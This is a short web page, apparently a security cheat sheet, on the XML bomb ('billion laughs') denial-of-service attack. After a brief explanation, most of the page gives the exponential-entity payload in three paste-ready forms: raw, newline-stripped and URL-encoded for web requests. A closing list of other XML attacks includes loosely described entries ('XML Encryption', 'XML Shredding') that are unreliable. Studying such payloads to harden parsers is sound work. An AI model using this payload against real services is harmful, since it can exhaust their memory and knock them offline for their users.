Skip to content

XML bomb attack

An XML bomb is a type of denial-of-service (DoS) attack that exploits the way some software programs handle XML data. The attack involves sending a specially crafted XML document to a vulnerable system, causing it to consume large amounts of memory and processing resources when it tries to parse the document. This can cause the system to slow down or crash, disrupting normal operation. XML bombs can be used to launch attacks on servers, web applications, and other systems that process XML data. It's important for developers to be aware of this vulnerability and take steps to protect their systems from XML bomb attacks.

😁 billion laughs attack 💣 xml bomb attack

raw cat lol.xml

<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

raw - without new lines cat lol.xml | tr -d '\n'

<?xml version="1.0"?><!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">]><lolz>&lol9;</lolz>

raw - url encoded cat lol.xml | python3 -c "import sys, urllib.parse; print(urllib.parse.quote_plus(sys.stdin.read().strip()))"

%3C%3Fxml+version%3D%221.0%22%3F%3E%0A%3C%21DOCTYPE+lolz+%5B%0A+%3C%21ENTITY+lol+%22lol%22%3E%0A+%3C%21ELEMENT+lolz+%28%23PCDATA%29%3E%0A+%3C%21ENTITY+lol1+%22%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%22%3E%0A+%3C%21ENTITY+lol2+%22%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%22%3E%0A+%3C%21ENTITY+lol3+%22%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%22%3E%0A+%3C%21ENTITY+lol4+%22%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%22%3E%0A+%3C%21ENTITY+lol5+%22%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%22%3E%0A+%3C%21ENTITY+lol6+%22%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%22%3E%0A+%3C%21ENTITY+lol7+%22%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%22%3E%0A+%3C%21ENTITY+lol8+%22%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%22%3E%0A+%3C%21ENTITY+lol9+%22%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%22%3E%0A%5D%3E%0A%3Clolz%3E%26lol9%3B%3C%2Flolz%3E

Other attaks on xml

  • External Entity Injection (XXE): This type of attack involves injecting external entities into an XML document, which can then be used to access sensitive information on the target system.
  • Blind XXE: Similar to XXE, but the attacker cannot directly observe the response from the vulnerable system.
  • XML Injection: This attack involves injecting malicious content into an XML document in order to modify or manipulate the data being processed.
  • XPath Injection: This attack targets the XML Path Language (XPath) used to search and extract data from XML documents. An attacker can inject malicious XPath expressions to access sensitive information or manipulate data.
  • XML Signature Wrapping: This attack involves altering the data within an XML document while maintaining the validity of its digital signature.
  • XML Encryption: This attack involves tampering with encrypted XML data, potentially leading to the exposure of sensitive information.
  • XML Shredding: This attack involves dividing an XML document into multiple parts, which can be reassembled in a way that allows an attacker to bypass security measures or access sensitive information.